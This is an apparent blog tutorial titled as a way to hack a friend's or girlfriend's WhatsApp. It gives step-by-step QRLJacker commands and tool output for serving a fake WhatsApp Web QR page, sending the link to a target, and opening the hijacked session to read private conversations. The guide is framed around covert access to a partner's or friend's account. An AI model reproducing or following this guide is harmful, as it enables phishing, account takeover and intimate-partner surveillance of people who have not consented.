How To Hack Whatsapp From Friend Or Girlfriend

The social engineering remains a widely used method of attack; Many malicious campaigns use social engineering to deceive victims and obtain their personal information without users being able to warn that they are being attacked by hackers and fraudsters.
Social engineering is a method used to work with tools such as QRLJacker, used to obtain sessions of WhatsApp Web. This is a program written in python that requires phishing for its full operation. As mentioned before, phishing is a social engineering variant that uses false login pages to collect victim credentials.
QRLJacker is the most common tool to hijack sessions of WhatsApp web, and can be functional in the initial phases of pentesting.
For the tests we have used Live Kali Linux 2019.4 amd64. During the QRLJacker test it did not work on installed versions of Kali Linux occasionally. The start of Kali Linux 2018.4, 2018.3 and 2019.1 amd64 was tested
  • The Geeko driver acts as a web browser engine used in applications developed by Mozilla. Create a link between Selenium (a python module) and the Mozilla browser. To install: wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gz
  • Type tar -xvzf geckodriver-v0.24.0-linux64.tar.gz and change the directory to one extracted
  • Type sudo mv -f geckodriver / usr / local / share / geckodriver
  • Write sudo ln -s / usr / local / share / geckodriver / usr / local / bin / geckodriver
  • Write sudo ln -s / usr / local / share / geckodriver / usr / bin / geckodriver
  • Remember to update the Firefox browser. For that, type sudo apt-get update & sudo apt-get install firefox-esr
  • Type apt-get install python3.7
  • Type apt-get install python3.7
  • Type python3.7 -m pip install -r Requirements.txt
  • Type python3.7 QrlJacker.py
_____________________________________
!\/        !        \/         ./
!/\        !        |\       ./
!  \       !       /  \    ./
!   \______!______|    \ ,/
!   /\     !    ./\    ,/
! /   \    !    |  \ ,/
!/     \___!____|  ,/   Everything is connected, even the simplest things!
!     / \ _!__ *\,/
!    !   \ !  \,/
!    !  | \! ,/
!----------K/
!    ! ,!  /|     QrlJacker-Framework By @D4Vinci - V2.1
!    !/   / |      Attack vector By Mohamed Abdelbasset Elnouby (@SymbianSyMoh)
!   / \  /  |          Loaded 1 grabber(s), 0 post module(s).
!\./   \/   |
!/\    /    |
!  \  /    .o.
!   \/     :O:
!   /       "
!  /
! /
!/
!
!
!


  • Enter help
QrlJacker> help

General commands
=================
        Command               Description
        ---------             -------------
        help/?                Show this help menu.
        os      <command>     Execute a system command without closing the framework
        banner                Display banner.
        exit/quit             Exit the framework.

Core commands
=============
        Command               Description
        ---------             -------------
        database              Prints the core version, check if framework is up-to-date and update if you are not up-to-date.
        debug                 Drop into debug mode or disable it. (Making identifying problems easier)
        dev                   Drop into development mode or disable it. (Reload modules every use)
        verbose               Drop into verbose mode or disable it. (Make framework displays more details)
        reload/refresh        Reload the modules database.

  • Write list and type use grabber / whatsapp
QrlJacker> list
 Name Description 
  grabber / whatsapp Whatsapp QR-sessions grabber and controller 
QrlJacker> use grabber / whatsapp 
  • Type options and type set port 1337
  • Type set host 192.168.1.7
QrlJacker Module (grabber / whatsapp)> set port 1337
 [+] port => 1337 
QrlJacker Module (grabber / whatsapp)> set host 192.168.1.7
 [+] host => 192.168.1.7 
QrlJacker Module (grabber / whatsapp)> options
 Name Current value Required Description 
  port 1337 Yes The local port to listen on. 
  host 192.168.1.7 Yes The local host to listen on. 
  useragent (default) Yes Make useragent is the (default) one, a (random) generated useragent or a specifed useragent

  • Type run , you can also run this on port 80 instead of 1337, to make it look like a real WhatsApp page
QrlJacker Module (grabber / whatsapp)> run 
[+] Using the default useragent 
[+] Running a thread to keep the QR image [whatsapp] 
[+] Waiting for sessions on whatsapp 
[+] Running a thread to detect Idle once it happens then click the QR reload button [whatsapp] 
[+] Initializing webserver ... [whatsapp]

  • After starting the QRLJacker server, you can send this link to your destination. For tests, we have opened the QRLJacker code generated in Windows 7. Write 192.168.1.7:1337


  • Go to the terminal where QRLJacker started in Kali. Typing sessions will show the hijacked accounts
QrlJacker Module (grabber / whatsapp)> sessions
 ID Module name Captured on               
  0 whatsapp Sat-Apr-13-04: 53: 03-2019

  • As you type sessions -i 0 , the Kali Linux web browser will open with the target's WhatsApp account; you must first open WhatsApp.com

  • After a few moments, the WhatsApp account will open

  • Now you have access to the WhatsApp conversation
Video practice with QRLJacker
Hack whatsapp
Published: 19-04-2019, 08:39
0
310

Related News


Add comment

reload, if the code cannot be seen

Up